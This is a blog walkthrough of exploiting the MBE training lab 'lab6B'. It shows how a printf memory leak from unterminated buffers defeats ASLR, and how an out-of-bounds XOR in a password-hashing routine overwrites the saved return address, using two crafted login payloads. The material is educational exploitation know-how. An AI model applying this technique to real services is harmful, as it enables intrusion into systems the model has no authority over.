The XOR madness of MBE's tricky lab6B - a walkthrough
This post is a continuation of my MBE (Modern Binary Exploitation) walkthrough series. In order to get some introduction, please see the previous post: https://hackingiscool.pl/mbe-lab6c-walkthrough/.
A look at the target app
So let's get right to it. The source code of the target application can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab06/lab6B.c. The lab6B.readme reveales that this time we are not dealing with a suid binary. Instead, we are supposed to compromise a service running on port 6642.
Let's see if we can interact with it from our MBE VM command line:
Nice, it's working.
Our target application is not actually capable of networking. This is covered by socat:
socat TCP-LISTEN:6642,reuseaddr,fork,su=lab6A EXEC:timeout 300 /levels/lab06/lab6B
For the purpose of better understanding of how the target program behaves and making its exploit development easier, let's compile our own version in /tmp.
The only change required is the hardcoded /home/lab6A/.pass path - with the assumption that we are doing our development from the MBE VM, using lab6B account (as we won't have the privileges to read it):
I just replaced it with pass.txt (the file needs to exist, be nonempty and readable for the program to work properly):
The source code overview
Now, the source code. Just like in lab6C.c, we have a 'secret_backdoor()' function here as well, so all we are gonna need is execution control:
Then we have the hash_pass() function. Takes two pointers to buffers (password and username) and XORs each byte of the password buffer the corresponding byte from the username buffer. The crucial property here is that the XOR operation will keep going until a nullbyte is encountered under password[i] index:
If a nullbyte is encountered under username[i] first, the rest of the password is XOR-ed with a hardcoded value of 0x44.
Then there's the lengthy load_pass() function, which simply reads the contents of the /home/lab6A/.pass file into the buffer pointed by the pointer passed as the only argument this function takes:
Now, this is how the main() function looks like:
It loads the local user password into the sercretpw buffer and hashes it with the hardcoded "lab6A" string (the target username). Then it calls the login_prompt() function, passing the original password size and the hash to it.
Then finally we have the login_prompt() function. It reads username and password to local buffers using strncpy() to only read maximum number of bytes up to the size of the current buffer to avoid overflow. Then it calls the hash_pass() function on the buffers. Then compares (memcmp()) the result with the password hash pointed by the pointer passed in the second login_prompt() argument, also making sure that it compares the exact number of bytes as it should (pwsize):
The first vuln
And honestly, I could not figure out where the vulnerability was. So I peeked into Corb3nik's solution https://github.com/Corb3nik/MBE-Solutions/blob/master/lab6b/solution.py only to notice the following part:
By the way, as the original version kept complaining about input arguments, before I read the usage comment, I simply modified it to make the 'remote' variant (hardcoded remote() method of interaction with hardcoded 127.0.0.1:6642): https://github.com/ewilded/MBE-snippets/blob/master/lab6B/solution.py. Either way, it works like a charm. Now let's find out how and why.
So, after sending the first set of credentials, the exploit is parsing the output from the application (p.recvline()) as a memory leak (individual byte ranges are saved in values with names corresponding to the names of local values stored on login_prompt()'s stack), right after encountering the "Authentication failed for user" string. This made me see the light and instantly revealed the first vulnerability - which by the way also makes the second vulnerability possible to exploit, but we'll get to that in due course.
The local readbuff buffer is 128 bytes-long. Both username and password are 32 bytes-long:
Now, what happens next is that fgets() reads a string from user input, saving it in the
readbuff buffer. To make the user input saved in
readbuff an actual string, fgets() will terminate it with a nullbyte. This means that if we provide, let's say, 60 characters of username, fgets() will make sure byte 61 is 0, so the string is terminated:
This itself is not an issue. However, what happens next is strncpy() blindly rewriting up to 32 bytes from
readbuff to username.
The same goes for
This means that if we provide at least 32 bytes both as username and password, both 32-byte buffers,
password, create a continuous 64-byte block of memory without a single nullbyte. Depending on the values stored next to it (in this case
result, and anything that follows, the continuous non-null memory block can be longer - and printable.
Every time after hash comparison fails, the address of the
username buffer is passed to a printf() call:
Provided with a pointer to the username buffer and the
%s formatting modifier, printf() will keep printing memory starting at
username and will only stop once it encounters a nullbyte on its way. Hence the memory leak necessary for us to obtain the information required to defeat ASLR (as we must provide the current, valid address of the login() function to EIP).
Running the app
Before we proceed any further, let's get the feel how all this data is aligned on the stack.
Let's put our first breakpoint here (betweeen strncpy() and hash_pass() calls):
Which would be this place in login_prompt() (at offset 278, right after the second strncpy() call is complete):
We can set a breakpoint on an offset, without first loading the program and using a full address, like below:
The breakpoint is hit let's have a look at the stack and identify what's what:
To confirm whether the value we think is the saved RET is in fact the saved RET, let's simply check the address of the next instruction after the login_prompt() call:
Yup. So we know how data is aligned on the stack when hash_pass() is about to be called.
Fair enough, let's create a second breakpoint - right after the hash_pass() call - to see how affects the values on the stack :
And once it's hit, we can see that the password (originally consisting of capital 'C's) was hashed with the username (capital 'B's), as well as were the two integer values (attempts and result) and stuff that follows them:
Even the trailing
0x80002f78 was changed to
0x80002e79 in result of the XOR operation. The XOR stopped on the nullbyte in
0x80002e79, leaving the 0x80 part intact.
At this point I got really worried about my understanding of the issue. How are we supposed to leak any memory layout information like the saved RET, saved EBP or anything revealing the current address base, if we encounter a nullbyte on our way earlier? We are always going to have nullbytes on our way with saved RET containing it due to the code segment base address containing such:
Then I noticed that the code segment has in fact a non-null base (just like the other maps) when we attach to an already running process instead of starting it from gdb (if you know the reason of this behavior please let me know).
As my goal was to figure out the exploitation myself and using Corb3nik's exploit for clues as last resort, I tried to develop the rest of the code myself, starting with this skeleton taken from his code:
Setting the pwlib's
context.log_level variable to
debug makes gives a great additional feedback channel during exploit troubleshooting and development.
Here's a sample run of this exploit skeleton (note the entire
[DEBUG] output, the script itself does not print anything explicitly except for "The pid is: ..."):
By the way, because I wanted to attach gdb to the target process before inducing the out-of-bonds read (so I proceed from this point developing the exploit), I made it print out the PID and pause, waiting for a key to be pressed:
This way we can conveniently attach to the process from a second console:
And the stack (marked red saved RET, the address of the next instruction after login_prompt() call):
The second vuln
Now let's see how the stack changed after the first hash_password() call (breakpoint 2):
First, we have our
username buffer (32 bytes of
0x42 value) intact. Then we have the
password buffer. It's also 32 bytes, originally of
0xff value we sent in our payload... now turned into
The 32 bytes of
password got XOR-ed with their corresponding
0x42 XOR 0xff = 0xbd. So far so good.
But what happens next, when
i becomes 32 and keeps incrementing, because no nullbyte was encountered under neither
username points at
username points at
password and so on. And
password points at
password points at
attempts and so on. XOR keeps XOR-ing.
Let's have a look at the two signed integer values (result and attempts), previously
0xfffffffe. Now they're
So, how did their bytes turn from
0x42? Had they been XOR-ed with
0x42 (username), they would now be nullbytes (which we don't want, by the way), because any value XOR-ed with itself becomes
They were originally
0xff and became
ox42 because they were XOR-ed with 0xbd (to check what was the value they were XOR-ed with, we can simply XOR the current value with the old value,
0x42 XOR 0xff = 0xbd):
So, the bytes that follow the password buffer (including the two integers, saved EBP and the saved RET) got XOR-ed with the contents of the password buffer... after the password buffer was XOR-ed with the username buffer.
And this is how we attained the second vulnerability - which, as we can see, allows us to change the saved RET!
Look again, the saved RET got changed as well (marked blue):
It's original value was 0xb77cdf7e, now it's 0x0ac162c3. Again, we can run simple test to see what was the value it got XOR-ed with:
Yup, it was
So, the second vulnerability is an out-of-bond XOR in the hash_function().
A XOR with a buffer that we control. So it is effectively an out-of-bond write (a XOR-chained stack-based buffer overflow).
And funnily, it has the same root cause, which is relying on whether or not a particular consecutive byte is null instead of using a maximum size boundary for write.
Understanding the exploitation process and implementing it
In order to trigger both the out-of-bonds read and out-of-bonds XOR, we must provide 32 non-null bytes of
username and then 32 non-null bytes of
Also, no byte at
username[i] can have its corresponding byte in
password[i] equal to it (that would lead to the relevant
password[i] becoming a nullbyte in result of the XOR operation, cutting us out from the further bytes on the stack).
This way the following things will happen:
password will get XOR-ed with
2) the bytes on the stack following the just XOR-ed
password buffer (
result, login_prompt() parameters, saved EBP and saved RET) will get XOR-ed with the new contents of the
password buffer - which is, again, what we provide as password then XOR-ed with what we provide as username.
3) Since this authentication attempt will fail, the printf() call will print out everything starting from the
username buffer through the XOR-ed
password to the rest of the values on the stack XOR-ed with the XOR-ed password up until a nullbyte is encountered.
So we use the out-of-bound printf() to actually obtain, among others, the saved RET. All these values are XOR-ed with the result of the
username XOR password operation.
At this point the program is in an incorrect state. The saved RET and saved EBP do not make sense. We will now how to trigger both vulnerabilities again with another authentication attempt, crafting the
username and the
password payloads in such a way that when the values on the stack (
attempts and saved RET) are XOR -ed with the
password buffer (which at that point will be the result of XOR between the
username and the
password we provide), they become the arbitrary values we WANT them to be.
Yes, in addition to the saved RET becoming the current address of the login() function, we also want to control the
attempts value, so the
while loop can end:
The login_prompt() function will not attempt to return until the loop ends. And the return call is how we gain execution control via saved RET overwrite.
What we need to do now is:
1) use the leaked values to calculate the login() address
2) craft the second username and password 32-byte payloads in such a way, that the current values on the stack (a copy of which we already got via the leak) - especially saved RET and
attempts - once XOR-ed with the
password buffer, become what we want them to be. Keeping in mind that the
password buffer will first get XOR-ed with the
username buffer, so we'll need to consider this order while preparing the payload.
All boils down to applying correct values and correct order of XOR-ing.
Let's start from the first payload again.
This time we'll use 'C' (
0x43) as username and
0x11 as password:
Now, reading the values from the leak:
We know they are XOR-ed with
0x43 ('C', the username) XOR-ed with
0x52. Again, these values can be arbitrary as long as they meet the conditions mentions above. And once they are picked, the following decoding and encoding will depend on these values.
We know that XOR-ing anything with the same value twice produces the same value back again. So:
0x43 XOR 0x11 =
0x52 XOR 0x11 =
Knowing that the hash_pass() encoded the stack variables with
0x52, we XOR them with
0x52 to make them make sense again:
OK, time for the second payload. This time we'll use 'D' (
0x44) as username, only to emphasize that it can differ here.
Obtaining the offset of the login() function:
Calculate the current ASLR-ed address of the login() function by preserving 20 most significant bits from the original saved RET and adding the fixed offset
0xaf4 to it:
Now crafting the payloads for saved RET and
attempts. We want such a value, which, when XOR-ed with currently messed up saved RET on the stack, will become the
new_ret address. As we know the current value of the messed up saved RET (the
xored_ret variable), we XOR it the
new_ret and save it in
new_ret_payload. When this value gets XOR-ed with
xored_ret in one stack with a hash_pass() call, two XOR-s with
xored_ret will make that value equal
new_ret (this is why I titled it "madness"):
Now the attempts value. We decode it with the
0x52 key from the first attempt, increment it by one (to get past the last, third iteration of the while loop instead of having to perform another dummy authentication attempt) and encode it back :
Now, one last layer of encoding. Before sending, we need to XOR everything with the
username value we chose for the second attempt, so the hash_pass() call XOR-ing the
password with it will reverse this process, making those values ready to be XOR-ed against the rest of the stack:
And lastly, we assemble the payload, fill it up to 32-bytes with some arbitrary character (e.g. 'E') and send it:
And here we go. Triggering the leak and the first out-of-bonds XOR:
Receiving the leak:
Sending the second authentication attempt payload:
And we're done:
The full source code with comments can be found here: